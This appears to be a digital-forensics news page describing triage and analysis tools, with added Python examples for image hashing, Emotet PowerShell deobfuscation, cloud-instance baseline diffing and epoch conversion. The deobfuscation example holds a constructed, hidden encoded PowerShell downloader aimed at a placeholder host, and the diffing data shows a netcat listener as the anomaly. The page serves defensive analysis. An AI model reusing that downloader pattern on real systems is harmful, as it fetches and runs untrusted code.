April 20, 2021

Cyber Forensicator


Software


Imago: Digital Images Forensics Tool

Imago is a Python tool that extracts digital evidence from images recursively. It is useful throughout a digital forensic investigation: if you need to extract digital evidence from a lot of images, this tool lets you compare them easily. Imago can write the extracted evidence to a CSV file or to a sqlite …
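
As an added illustration of what such a tool does under the hood (this is example code written for this page, not Imago's own source), the script below walks a directory tree, hashes every JPEG, notes whether the file carries an Exif APP1 segment, records everything in a sqlite table and reports files with identical content. The two embedded JPEGs are constructed minimal files; the table layout, the hash choice and the `.jpg`/`.jpeg` filter are assumptions made for the example.

```python
import csv
import hashlib
import sqlite3
import tempfile
from pathlib import Path

# JPEG markers that carry no length field (TEM, RSTn, SOI, EOI)
STANDALONE = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))


def jpeg_segments(data: bytes) -> list:
    """Walk the marker segments of a JPEG up to the start of scan (SOS).
    Returns (marker, payload_offset, payload_length) tuples; [] if not a JPEG."""
    if data[:2] != b"\xff\xd8":
        return []
    segs, pos = [], 2
    while pos + 2 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in STANDALONE:
            if marker == 0xD9:          # EOI: nothing follows
                break
            pos += 2
            continue
        if pos + 4 > len(data):
            break
        length = int.from_bytes(data[pos + 2:pos + 4], "big")  # counts its own 2 bytes
        segs.append((marker, pos + 4, length - 2))
        if marker == 0xDA:              # SOS: entropy-coded data follows, stop walking
            break
        pos += 2 + length
    return segs


def has_exif(data: bytes, segs: list) -> bool:
    """True if an APP1 segment starts with the Exif header."""
    return any(m == 0xE1 and data[off:off + 6] == b"Exif\x00\x00" for m, off, _ in segs)


def scan(root: str, db_path: str = ":memory:") -> sqlite3.Connection:
    """Recursively hash and fingerprint every JPEG under root into a sqlite table."""
    con = sqlite3.connect(db_path)
    con.execute("CREATE TABLE IF NOT EXISTS images (path TEXT PRIMARY KEY, size INTEGER, "
                "mtime REAL, md5 TEXT, sha256 TEXT, has_exif INTEGER, segments TEXT)")
    for p in sorted(Path(root).rglob("*")):
        if p.suffix.lower() not in {".jpg", ".jpeg"}:   # assumed filter for the example
            continue
        data = p.read_bytes()
        segs = jpeg_segments(data)
        con.execute(
            "INSERT OR REPLACE INTO images VALUES (?, ?, ?, ?, ?, ?, ?)",
            (str(p), len(data), p.stat().st_mtime,
             hashlib.md5(data).hexdigest(), hashlib.sha256(data).hexdigest(),
             int(has_exif(data, segs)), " ".join(f"{m:02X}" for m, _, _ in segs)),
        )
    con.commit()
    return con


def duplicates(con: sqlite3.Connection) -> list:
    """(sha256, count) for content that appears under more than one path."""
    return con.execute("SELECT sha256, COUNT(*) FROM images "
                       "GROUP BY sha256 HAVING COUNT(*) > 1").fetchall()


def export_csv(con: sqlite3.Connection, out_path: str) -> int:
    """Dump the table to CSV for use in a spreadsheet; returns the row count."""
    cur = con.execute("SELECT * FROM images ORDER BY path")
    rows = cur.fetchall()
    with open(out_path, "w", newline="") as fh:
        w = csv.writer(fh)
        w.writerow([c[0] for c in cur.description])
        w.writerows(rows)
    return len(rows)


# Constructed minimal JPEGs: one with an Exif APP1 segment (TIFF header "MM\0*"),
# one with only a JFIF APP0 segment. Neither contains image data.
EXIF_JPEG = (b"\xff\xd8\xff\xe1" + (12).to_bytes(2, "big")
             + b"Exif\x00\x00MM\x00\x2a" + b"\xff\xd9")
JFIF_JPEG = (b"\xff\xd8\xff\xe0" + (16).to_bytes(2, "big")
             + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + b"\xff\xd9")


def build_sample_dir() -> str:
    """Write the constructed samples (plus a renamed duplicate) into a temp tree."""
    root = Path(tempfile.mkdtemp())
    (root / "a.jpg").write_bytes(EXIF_JPEG)
    (root / "b.jpg").write_bytes(JFIF_JPEG)
    (root / "sub").mkdir()
    (root / "sub" / "a_copy.jpeg").write_bytes(EXIF_JPEG)
    return str(root)


if __name__ == "__main__":
    con = scan(build_sample_dir())
    for row in con.execute("SELECT path, has_exif, segments, sha256 FROM images"):
        print(row)
    print("duplicates:", duplicates(con))
```

The segment walker stops at SOS deliberately: everything an examiner wants to compare (Exif, ICC, XMP, JFIF, quantization tables) lives before the entropy-coded data, so there is no need to read the whole scan. Hashing the full file separately catches byte-identical copies under different names, the case a sqlite `GROUP BY` on the hash surfaces instantly.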


Deobfuscating Emotet’s PowerShell Payload

Lasq has posted a step-by-step guide on how to deobfuscate Emotet's PowerShell payload, and has also shared a Python script to automate the process. Emotet is a banking trojan that has targeted computer users since around 2014.
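
The page does not say which obfuscation layers Lasq's guide and script handle. As an added example (written for this page, not Lasq's script), the code below strips two layers that are generic to malicious PowerShell launchers rather than specific to Emotet: the base64/UTF-16LE `-EncodedCommand` wrapper and the concatenation of quoted string fragments. The sample command line is constructed here, points at the reserved `example.invalid` domain and is not a real Emotet payload.

```python
import base64
import re

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -enc, ...)
# followed by a base64 blob. Assumed to be good enough for launcher-style command lines.
ENC_RE = re.compile(r"-e[ncodedma]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Two adjacent quoted literals joined by '+', e.g. 'ht'+'tp'
CONCAT_RE = re.compile(r"""(['"])((?:(?!\1).)*)\1\s*\+\s*(['"])((?:(?!\3).)*)\3""")
URL_RE = re.compile(r"""https?://[^\s'"()]+""")


def decode_encoded_command(cmdline: str) -> str:
    """Return the script hidden behind powershell's -EncodedCommand switch."""
    m = ENC_RE.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    # The switch carries base64 over the UTF-16LE bytes of the script, not UTF-8.
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def collapse_concat(script: str) -> str:
    """Merge 'a'+'b' into 'ab' until no adjacent string pair remains."""
    prev = None
    while prev != script:
        prev = script
        script = CONCAT_RE.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", script)
    return script


def deobfuscate(cmdline: str) -> str:
    return collapse_concat(decode_encoded_command(cmdline))


def extract_urls(script: str) -> list:
    """Indicators worth blocking once the string fragments have been joined."""
    return URL_RE.findall(script)


# Constructed sample: a downloader one-liner hidden behind string concatenation and
# -EncodedCommand. example.invalid never resolves, so this cannot fetch anything.
SAMPLE_SCRIPT = (
    "$u=('ht'+'tp'+'://exa'+'mple.inv'+'alid/do'+'cs/pay'+'load.bin');"
    "(New-Object Net.WebClient).DownloadFile($u,$env:TEMP+'\\x.exe')"
)
SAMPLE_CMDLINE = "powershell -nop -w hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_CMDLINE))
    print(extract_urls(deobfuscate(SAMPLE_CMDLINE)))
```

Note that `extract_urls` finds nothing in the raw decoded script, which is the point of the concatenation layer: a URL regex over the undecoded command line or over the still-fragmented script produces no indicator. Real samples typically add further layers (format operators, `-replace`, character-code arrays), each of which needs its own pass of the same shape.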


POSH-Triage

Mike Cary has written a PowerShell script that automates the use of Eric Zimmerman's command line tools (https://ericzimmerman.github.io/) against a mounted forensic image. The following tools are run where applicable to the image being processed:

  • JLECmd.exe
  • LEcmd.exe
  • PEcmd.exe
  • SBECmd.exe
  • AppCompatParser.exe
  • AmcacheParser.exe
  • RecentFileCacheParser.exe
  • WxTCmd.exe
  • MFTECmd.exe
  • Registry Explorer project file creation

Learn more about the script at Mike's GitHub.


Diffy: A Triage Tool for Cloud-Centric Incident Response

Diffy is a digital forensics and incident response (DFIR) tool developed by Netflix's Security Intelligence and Response Team (SIRT). Diffy allows a forensic investigator to quickly scope a compromise across cloud instances during an incident and triage those instances for follow-up actions. Diffy is currently focused on Linux instances running within Amazon Web Services (AWS), but owing to our plugin …
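
An added example of the comparison idea behind this kind of triage tool (example code written for this page, not Diffy's source or its plugin API): collect a per-instance inventory, derive a baseline from what most of the group has in common, and flag the instances that deviate from it. The inventories and instance IDs are constructed, and the 50% prevalence threshold is an assumption.

```python
from collections import Counter


def baseline_from_group(inventories: dict, threshold: float = 0.5) -> set:
    """Items present on more than `threshold` of the instances in a functional group."""
    n = len(inventories)
    counts = Counter(item for inv in inventories.values() for item in inv)
    return {item for item, c in counts.items() if c / n > threshold}


def diff_against_baseline(inventories: dict, baseline: set) -> dict:
    """Per instance: what it has that the baseline lacks, and what it lacks that the baseline has."""
    return {
        name: {"extra": sorted(inv - baseline), "missing": sorted(baseline - inv)}
        for name, inv in inventories.items()
    }


def outliers(report: dict) -> list:
    """Instances whose diff is non-empty, i.e. the candidates for deeper triage."""
    return sorted(name for name, d in report.items() if d["extra"] or d["missing"])


# Constructed inventories: (process, listening port) pairs per instance, as they might be
# collected with osquery or `ss -lntp`. Not real data; the instance IDs are made up.
SAMPLE = {
    "i-0a1": {("sshd", 22), ("nginx", 443), ("node", 8080)},
    "i-0a2": {("sshd", 22), ("nginx", 443), ("node", 8080)},
    "i-0a3": {("sshd", 22), ("nginx", 443), ("node", 8080), ("nc", 4444)},
    "i-0a4": {("sshd", 22), ("node", 8080)},
}

if __name__ == "__main__":
    report = diff_against_baseline(SAMPLE, baseline_from_group(SAMPLE))
    for name in outliers(report):
        print(name, report[name])
```

A prevalence baseline is blind to anything that is present on most of the group, so when a freshly launched, known-clean instance of the same type is available, pass its inventory as the baseline instead (`diff_against_baseline(SAMPLE, SAMPLE["i-0a1"])` gives the same result on this data). Both "extra" and "missing" matter: an unexpected listener is the obvious signal, but a service that should be running and is not can be the trace of an attacker who stopped it.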


Office365 Log Analysis Framework

After yesterday's webcast, Matt Bromiley released his Office365 Log Analysis Framework (OLAF) to the public. You can learn more about the framework and download it here. Also make sure to check out the webcast.


LiMEaide: Dump Linux Memory Remotely

LiMEaide is a Python application designed to remotely dump the RAM of a Linux client and create a Volatility profile for later analysis on your local host. This simplifies Linux digital forensics in a remote environment. To use LiMEaide, all you need to do is feed it a remote Linux client IP address, sit back, and consume your favorite …


Memtriage: a tool for Windows memory live analysis

Memtriage allows you to quickly query a live Windows machine for RAM artifacts. The tool uses the WinPmem driver to access physical memory and Volatility for analysis. Learn more about it here.


afro (APFS file recovery)

afro can parse APFS images. It extracts not only the latest data but also older versions of files. Learn more about the tool here.


Epochalypse: Utility to Convert Epoch Timestamps

The Epochalypse utility by Pasquale Stirparo has been updated and now supports APFS timestamps. You can download this Python script from Pasquale's GitHub.
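
An added example of the conversion such an epoch utility performs (example code written for this page, not the Epochalypse script): the same 64-bit integer is interpreted under several epoch and unit conventions, including APFS, which stores nanoseconds since 1970-01-01 UTC. The set of formats and the 1995-2040 plausibility window are assumptions made for the example.

```python
from datetime import datetime, timedelta, timezone
from fractions import Fraction

UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
WINDOWS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
HFS_EPOCH = datetime(1904, 1, 1, tzinfo=timezone.utc)
COCOA_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)

# format name -> (epoch start, microseconds per tick). Exact Fraction arithmetic is
# used on purpose: a 19-digit APFS value does not fit in a double without rounding.
FORMATS = {
    "unix_seconds":        (UNIX_EPOCH,    Fraction(1_000_000)),
    "unix_milliseconds":   (UNIX_EPOCH,    Fraction(1_000)),
    "apfs_nanoseconds":    (UNIX_EPOCH,    Fraction(1, 1_000)),   # APFS: ns since 1970-01-01 UTC
    "windows_filetime":    (WINDOWS_EPOCH, Fraction(1, 10)),      # 100-ns ticks since 1601-01-01 UTC
    "webkit_microseconds": (WINDOWS_EPOCH, Fraction(1)),          # Chrome/WebKit: us since 1601-01-01
    "hfs_plus_seconds":    (HFS_EPOCH,     Fraction(1_000_000)),  # HFS+: s since 1904-01-01
    "cocoa_seconds":       (COCOA_EPOCH,   Fraction(1_000_000)),  # CFAbsoluteTime: s since 2001-01-01
}


def convert(value: int, fmt: str) -> datetime:
    """Interpret an integer timestamp as the named format; returns an aware UTC datetime."""
    epoch, us_per_tick = FORMATS[fmt]
    return epoch + timedelta(microseconds=int(value * us_per_tick))


def plausible(value: int, lo: int = 1995, hi: int = 2040) -> dict:
    """Every interpretation of value that lands inside a plausible investigation window.
    Useful when a raw number is found with no hint of which artifact produced it."""
    out = {}
    for fmt in FORMATS:
        try:
            dt = convert(value, fmt)
        except OverflowError:        # e.g. a FILETIME read as seconds is beyond year 9999
            continue
        if lo <= dt.year <= hi:
            out[fmt] = dt.isoformat()
    return out


if __name__ == "__main__":
    print(convert(1_600_000_000_123_456_789, "apfs_nanoseconds"))
    print(plausible(1_600_000_000))
    print(plausible(132_000_000_000_000_000))
```

`plausible()` is the call to reach for when a bare number turns up in a database column or a carved structure: a ten-digit value is reported only as Unix seconds, while an 18-digit value lands in the window only as a Windows FILETIME. Python's `datetime` keeps microseconds, so the last three digits of an APFS value are dropped by `int()`; print the raw integer alongside the converted time when two writes within the same microsecond must be ordered.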


Darwin-Collector – collect key files for macOS investigations

Darwin-Collector.sh is a script designed to be run against a mounted image, a live system, or a device in target disk mode. The script automates the collection of key files for macOS investigations. You can learn more about the tool and download it here.



About Us

Cyber Forensicator is a web project by Igor Mikhaylov and Oleg Skulkin that aims to collect the most interesting and important cyber and digital forensics news, articles, presentations, and so on, in one place.


CyberForensicator.com © Copyright 2016-2021, All Rights Reserved
